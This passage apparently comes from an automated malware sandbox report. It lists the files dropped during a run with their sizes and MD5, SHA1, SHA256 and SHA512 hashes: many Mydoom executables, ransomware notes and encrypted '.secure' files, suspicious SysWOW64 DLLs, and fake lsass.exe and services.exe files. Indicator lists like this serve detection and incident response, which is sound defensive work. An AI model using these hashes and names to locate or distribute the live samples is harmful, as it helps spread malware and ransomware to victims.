                                                                                                                                                                                                                                                                5e12e4ffaf434eceb4cf37e66e3627e2738370e381efb32b8147bb2c89153286707a872b5aa523850dd1d1a2724398b297eb4fba9a49e7510ad377858cb601e8

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\Cpriv.Loki
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                aa348adde12caa03854930c37028e316

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                21a7f229811df3811f98836629d425036cf9f185

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                acccb29588fa023db2303c1000eb8325e7653d3f36400d9c48f51951d49010e5

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                f3693baf06c672b9ef8a184962da6f6ed3d4b07896ae63b7227ad81cda176445829f31f75e8758a0a0f71228e1cba3761b4ef2c6cc89efa050e63221f56cabe3

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\00b9b6cf27deeda8de99d1719ef724808afa92080026df8dd17159be8ea420f7.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                879KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                af466faccd8bbab030d12caf7b16ea61

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                e18711fe226d39fe182c45ea1a15ccc587980b67

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                00b9b6cf27deeda8de99d1719ef724808afa92080026df8dd17159be8ea420f7

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                2599b3b6db13c14e36bc24980da5457c8788624050ad727d2b1d8975b6405e1a6dfee9829a849900edcc7cc831b69604cce9e6e7e0080835e426df343a1d6e64

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\0b75e2fadffc45dff940e58f5b6f8d99832426bb880f432f98d853308b29c9c5.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                355KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                ff4c98aae03f63b8256dd765e99f5934

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                db774f2c4a2ed02f42effd6016e6ee7b8ae5cfde

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                0b75e2fadffc45dff940e58f5b6f8d99832426bb880f432f98d853308b29c9c5

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                eea1f000945adf51217d3b3e6faaa947c683de5c278ce0c7870360d959d65347804b563853d32ce2d49bd6fb0567c9d0d065ee561bb4b16d66af1bbd98197c1d

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\0d5fa75218e5eb97fccbcf36d3bbd9cd77247260977f69c50deb29399ee0e464.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                9.4MB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                813b749967045532f86e6442447bcd8b

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                8d0615e7f7ba672a3fc94c05a9451f9d08797af7

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                0d5fa75218e5eb97fccbcf36d3bbd9cd77247260977f69c50deb29399ee0e464

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                47c16f403ab33ebb9e59c7c3a053dc29d0d654174d2be9153966ad9fc873e641f34ab44c7e38fb4c6fd376b384d4e1da0dacafb384e9abb1c7eb92cb32533877

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\1760c5727e5568d3b18a1cbf0d50c311613699af8233c96fb3eee197f438ce9c.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                28KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                e26570922a9373c1f3a06f647ddd10a4

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                e0f6853e39e0b9fbcb3062bb7e15b8734b9df9f3

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                1760c5727e5568d3b18a1cbf0d50c311613699af8233c96fb3eee197f438ce9c

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                e17a8c1ca8aa6c65106831086f203736b7bdd92c54d2487f381f7d7303a5f3852859935ef55a913dd8856c6015a5f9414308430ae1ff4b5690743025f8ff4c70

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\1fe99fb7c527a90826896e695f23e712375358df3c7aa9163af6b96d872a9f81.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                21KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                26b8bc40d95b979e1e708a9f843242ad

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                229284e8cb74bbfae647eb160e4188bda3e50721

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                1fe99fb7c527a90826896e695f23e712375358df3c7aa9163af6b96d872a9f81

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                e53fb1b351f47227c1568718c99cc78048507518ac823cebccddebdc630845f9c972a746036f67d416275bdb1667d298ddd6a0fd4e0fea4dc096d7c2cfcf0625

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\23361735678f37d77510b22306c727a987f84c87143bb0062f3d76413c36fc98.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                21KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                3f122d9a0b7a9f1aa8c973d170ee8d55

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                3fb032e1a7a3a9cc5ce0d5f03fbb7f74a063ce39

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                23361735678f37d77510b22306c727a987f84c87143bb0062f3d76413c36fc98

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                25b3db24d20482476e07e29bcee1e231e106d1ec8e36bc390960085595816268ced9c6d392ee21e48c0643801e14c4bb88e1d006fc35467a1abf7b66a423fad4

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\2af6bc16f25822d6d2f1429bc15f3d47f6c0bcb026ba387249d173fc753919b2.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                22KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                44fad0089dd3b0b481f30486646fd3f0

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                54a3e4359bedeba0d8747e2bc7e94ebbd48feef3

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                2af6bc16f25822d6d2f1429bc15f3d47f6c0bcb026ba387249d173fc753919b2

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                7137de8a76aa91bc921a7334dde182eaa786a42bc5dc7369e9265f9226ea52bedf003e8ba707f297d880828daa5f1183233d985cb98e371eb711c2523a1a0acc

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\3d9f9c162e130c197301adb5a4e141f2e1ae8a19c85b457c429e8410a5c91464.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                41KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                3e67d212278e1af5be913d236399fcf6

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                f993125ed4af1de6a551a6e0843a6d124cd46f27

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                3d9f9c162e130c197301adb5a4e141f2e1ae8a19c85b457c429e8410a5c91464

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                f7e6394c9f9fdd6a03c72aaece5b4911cb821680a632f94b622b12d94cff9873d93b2c6604016524bdab4dd6e4b70b532c440f6b296138677be19e078ad23ec7

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\4d61a61265cdd942cff973609170529eaf19579b5d17e64deccbd6f6f1fdfa08.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                29KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                0d14590170f35263c0e3f0e0e1594720

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                21414e31724eb95408a4031a0c0508b2a12260e7

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                4d61a61265cdd942cff973609170529eaf19579b5d17e64deccbd6f6f1fdfa08

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                76e6fbd04c08b749b46ce1499e15ad58d7bb8d0c20db0a0fae54001f973aaa73e961cf80558c090d31d7f69918562c519c01c2cb441548feca63cea37792aa3c

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\5642f8bd3bc151349ded1a3c160c037c26194c9da2b7ace5d8ca11cddb57612a.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                41KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                64276638075d3cab665966be7f366682

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                3fb9c599d5dc9188332b4a9c0f1262c07ee24699

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                5642f8bd3bc151349ded1a3c160c037c26194c9da2b7ace5d8ca11cddb57612a

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                1bbd7440a14f8651ef4433cdda3a48071024838688f8ff88a0688cf56f28854232446f655731a44d1f02f1e572697e132f06c92dfa170825433154042be02826

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\6c37d14d5ad674e4c0fa8df0a999be6b27399936c9ff16f7fb30b802addb7b4c.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                28KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                e5128ece1b9916a6df7cd56d66c193c2

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                c99f687b182f3dee71e8434360595832ea431075

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                6c37d14d5ad674e4c0fa8df0a999be6b27399936c9ff16f7fb30b802addb7b4c

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                67b9166f33c78140ce2259df9a7bae92e6cae066b7f54cb0ebdec183ef1ffaf958f6cd24b0bb01e2b6a302fb73e9c5c057554c825e1496ef3b679e77dd7715af

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\6c3c9af653a28977257ce971ed701b1b893cdf67d5c57baa44a9d76c28675dc3.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                21KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                41a7ddd957c89fc7d20b60fbb7526198

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                2b3575ced3fb5227c1b21cb5a5d70de6ee20ac5e

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                6c3c9af653a28977257ce971ed701b1b893cdf67d5c57baa44a9d76c28675dc3

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                c97c733c37423269eefff67c66caf04317dbcfb8dc678cae18b265f9cde57ff0677c93cceaa0cda05e70daa3446d507538f1db9b37a30078568542a8cf67bec5

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\7bca70a81cc9e1067e99e313802a4cc095f79bbc3a1aa86b7b3b9eabf3748e61.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                29KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                18e2d2d193f1b5e2fe2cec1f6b4c5c38

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                5c9e2ecd155da2d8822187398d58febd1044a1e4

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                7bca70a81cc9e1067e99e313802a4cc095f79bbc3a1aa86b7b3b9eabf3748e61

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                3a961ff5d823450134acc34fb984bd5105fcf02c65692ee5fc7273c6de9fc64185cc548ea1de6d5622d6985e754943a4b4d235458eb41bef469027e6b11a35ba

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\8e934dcd46eb57d42712d097deab6ce00ef1ce2db87d03f8d3d8e8c10da7e088.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                45KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                3aa484f942ddfeff67d043fafb9877bb

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                966cbc5b018d94b1797ad5d506ca4d3cb639eca7

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                8e934dcd46eb57d42712d097deab6ce00ef1ce2db87d03f8d3d8e8c10da7e088

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                9356aa0648b93558e0e3af85a9d08449f63c4e6675f82feed9b386425fcbcb7e391b2dfbc114055d0d2b779407b40074f7083205b194c0fa460e99ba8b635612

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\9a75c8e353df060ec927ada5990402b57764275f2a860d9cf500a661ec3de060.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                41KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                cdc7a9e456810fd6d0a5f9129c633c03

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                3fd75d798773bbb29b26a4c9b9c0635ff52fee57

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                9a75c8e353df060ec927ada5990402b57764275f2a860d9cf500a661ec3de060

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                635346ea4d4c29618469e2aac76e12280e89d44b3fc22e1b522608a5c2352337d20745116e85bcf96e592261d5adb460e1bae8ae2a41e27e0a32298567462c11

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\9e067453f09c5cbfa4c5a74fe3e70d7d8e66a25057e6c35240dce5a40ec31bf3.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                28KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                f64e4d13a57ae222768b792b2c16158d

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                5a0878beb5a8a464f71629f560b8ac12473776e7

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                9e067453f09c5cbfa4c5a74fe3e70d7d8e66a25057e6c35240dce5a40ec31bf3

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                e9bab92bb7df9414f531b579449c72fd911c9cc0e59809cb6105ef8bdd3cc7818e5626ef57159a7362a82e7cdbfbe2a0f58839e0167a696d3217e622143925a1

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\info.hta
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                3KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                1aebc3d0a4e679ed5ad14dbdae452485

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                2edc8b8e128f1d65e35c3c3a41306458558637bc

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                ad630480d5445f23d5cdc733c25a870231fa18ea2b573a40ceae3f0771e0edba

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                605884665cf6bd398c4ea0cf9400c5ebd81dc4b68227ba1cd23b3866b9db128a0fac918586e527ecae3c79efe5d0bacfc4814ccbe867b08f8970fbe785085f30

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\a9a89ed0d139fbc436794f5d3a8e58c547247039d8c86767b1e2f2bce40e390f.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                41KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                ec9e58951bf3e0ff91c5f86cae637dc4

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                8f2e5fce00e3f5265deabaa71a9243d1b936395c

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                a9a89ed0d139fbc436794f5d3a8e58c547247039d8c86767b1e2f2bce40e390f

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                466d31863ee8d7765b436f75588da017b095ac66f86deb8dff41fc2349de456da8dbb59bec863c4a754fc68a210ad8e1c578d968312c9ea0595d4aab7fb2f0a5

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\b4ab8f5c8b97307b328ba30fdefdbe4341c4e2c576729fdb5c7329d5b07bb695.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                41KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                2f0ded84c37387024cd7145bd7e64e88

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                61803770a6bdf2aafb3f7efcc3c135d63ddd55b5

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                b4ab8f5c8b97307b328ba30fdefdbe4341c4e2c576729fdb5c7329d5b07bb695

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                efe39f1abf0c1ae5662c95bdcc7022e5982069e7656860356643eabf4a567639136125294dfd3ecbde72e0853e886a88b5d085d8c757c7b63f67cb000b510848

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\c03431309015563257e5e118656d07ce136f151339054b9f66894ecf9dde9aef.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                856KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                733766ff5495f04d82744291993eb69e

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                2830778313fd7fccc6c8129d419b1757368078fd

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                c03431309015563257e5e118656d07ce136f151339054b9f66894ecf9dde9aef

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                cf3bf548e743894888ba3ea191a289f09d9f36215e1306aa21e61f0ea81473eec6df01a6e7f05f9251ecb9cc71c654934a53d4916c4152bf8fa4a95119e98cf2

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\c45a330cf80c33977658649596d4867301e928381c5fc37ec3edabfad2251324.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                29KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                5b4833161897a50ab4688e2990d1d24b

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                0a04dd46bca64169511b4bcdc8ea36eb8ad55012

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                c45a330cf80c33977658649596d4867301e928381c5fc37ec3edabfad2251324

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                df87dacc161a583dbc060ddc60868476ba5a864021644da643475a93805229a633eb8f0ade738f2512e05b7ec3c8647d877bc4658beb475bd6b0347568caaf5e

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\e16d377c12b63acb694601b4bde36d61839054409e7fae1661fb051892d2ed36.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                41KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                edf4ff0bc5da6dabd5e7b78113d73bd8

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                af49d2935b75627f6f748256f10c555d54040f2e

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                e16d377c12b63acb694601b4bde36d61839054409e7fae1661fb051892d2ed36

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                68d5d0a81964eda0b156ef4e82d26ca479d32b4a19dfbec44b4058a6322e8c1f62dff1ea4f7e61812470790a2029b285c365bf6da69d31e99788fdd24e17e2f6

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\e302f733d4a31342a0c908055a6e59b3fd8f1ed3ce98750d00251e4f0efe6c02.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                41KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                c89cb72586afe2f652ccea009225cec6

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                89617d49fe5366b120d6fe9fa098bca7d3b5e1ad

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                e302f733d4a31342a0c908055a6e59b3fd8f1ed3ce98750d00251e4f0efe6c02

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                dd53d4e714d1f39300a5ac0988877c857546a1f4117bb06e2cd0db567ad8949be1dc4f7fb7ec83e077f546501b72715c8a92af70be89c7c5e30102b6413f6f31

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Mydoom\fe3b2cf08a6224a04194a6555b4593b0a7428cb1fe057c08776d09568fc58cd5.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                45KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                455fabda3dcf8184c8e868434db1824d

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                207aae8317a9c16042ae32adc7aed7106a950ab3

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                fe3b2cf08a6224a04194a6555b4593b0a7428cb1fe057c08776d09568fc58cd5

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                363e81837cb00b7f35c5fa73ff0e6a1f15a20e47ce95344b5fcebd6c00457b0aeef4bb27c7b09a620d14b18112e5ae024537f4f11dc96088b8f6de0edc449538

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\New folder\Restore-My-Files.txt.secure[[email protected]]
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                335B

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                328b70078bb02add4e0b9025d8d51a7f

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                db1dfd3ccdb8bc5e21728cc9820cc21983eace67

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                e0312e8359182927a5f5befebc3131e001d94245adcaf3d3608c053c65e537a4

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                aafc822909ebfce25c5ba471b90f0b6feeafb02f463666b08c36e1e67b801e042c55fa922c80f1d508b8ec99d246a84e49982d1bbeb3a1c95651109c49486051

                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                914B

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                92ad4a55129f6377797e0a1cb45d8e8c

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                8fee5c23f70b505cd2e59ff6d4a7a45e556e3a06

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                7064db7a9b22a1609100afd1e05092fb61b86bcaa5580bb9618b3efe2183633f

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                b0417a08b74ee5f2041faf5c31f28119a11d380ed6bb29e216e0a3033f580141766587fbb9ba4987c4b654b1f7a1f7c1dc02e98a9f71da1be0eae39121c0cf0e

                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\Cpriv.Loki.secure[[email protected]]
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                afc172f4961063b64a41c943c70d815e

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                8684581953a729890bdc27fe94e8064d8a1ead38

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                2043849b73e9682869019f8c415d38d1d1d952b5e9b52624fd5f8e57fcb4e60a

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                ac37eea689723ac80cb442cb75f6d622967b4599d474bcb8c7d102db0804a995b6e7a2553995d83b2f4d99be81d55a4e548a02d130362fd4972da7223593e2b3

                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\ctfmen.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                df20e3a153203f04793b58ed2cf895de

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                f6dc38cd9c0006e01a6a9c15d30ff34672e4462c

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                6284a012fe2ed6f74b7738c9a202ba0a93517b78d2b58e3200404f27d033af22

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                66b3d1e0b86448c1529dc380b06059a8b20ef2de18d5b7d4b951212468d818fe54289676762980d444cc31007db57815d0eeecee3f4ed1d8b01016d2aef94a21

                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\grcopy.dll
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                41KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                2fc648f9045faef0af62cfe8937dd227

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                a315ea2421b41d625d6545209678c68ea55e884f

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                637fdb720b8b919f371d7f6871652030b5737f2590f90a55a413758a4c18960c

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                1bbafb1f77f978c03d6fa1878512baa39d96b069f8dbca0b354d96460ab6d98ce40d278d1b57e25c93ac9072c90bfd806e6c3e0462e498a4de77c9773fa05220

                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\satornas.dll
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                183B

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                f980b9a8c509d2368ee4277c70aa9fd7

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                8cdcf646a6a3a102bdb0b9c1e987a018d8e0c35b

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                8ea777f4d95dac764998a42371697e0075b91656fe9d96dfbbf7487db0750c39

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                4fb6ec79a171e76d5a1831829fcd5752919b7982e1eab3814a842ce2ae90438d15d0195436ff78ffa6e36e8feee9c26dffb8630e68d629850874cc3bbfe62eaf

                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shervans.dll
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                6fa07d3216da30c47a5c5326d0265f6a

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                016c15e9538fae1f0e59369a3467f04a47385d6c

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                51e6f64e2aacef7ca12a4499071dadcc5535d8b7b5965c46ac321ef2e6240671

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                14f7e91180d2248772e28da36d3434ea528b4e0aa68d174eccc8bda9c7cdc220369b99de147f8e2286f9826c9fe92185851d237e9c3c4d6920d6bdf4d2e056df

                                                                                                                                                                                                                                                              • C:\Windows\lsass.exe
                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                              • C:\Windows\services.exe
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                b0fe74719b1b647e2056641931907f4a

                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                e858c206d2d1542a79936cb00d85da853bfc95e2

                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                bf316f51d0c345d61eaee3940791b64e81f676e3bca42bad61073227bee6653c

                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                9c82e88264696d0dadef9c0442ad8d1183e48f0fb355a4fc9bf4fa5db4e27745039f98b1fd1febff620a5ded6dd493227f00d7d2e74b19757685aa8655f921c2

                                                                                                                                                                                                                                                              • memory/220-686-0x0000000000500000-0x0000000000510200-memory.dmp
                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                64KB

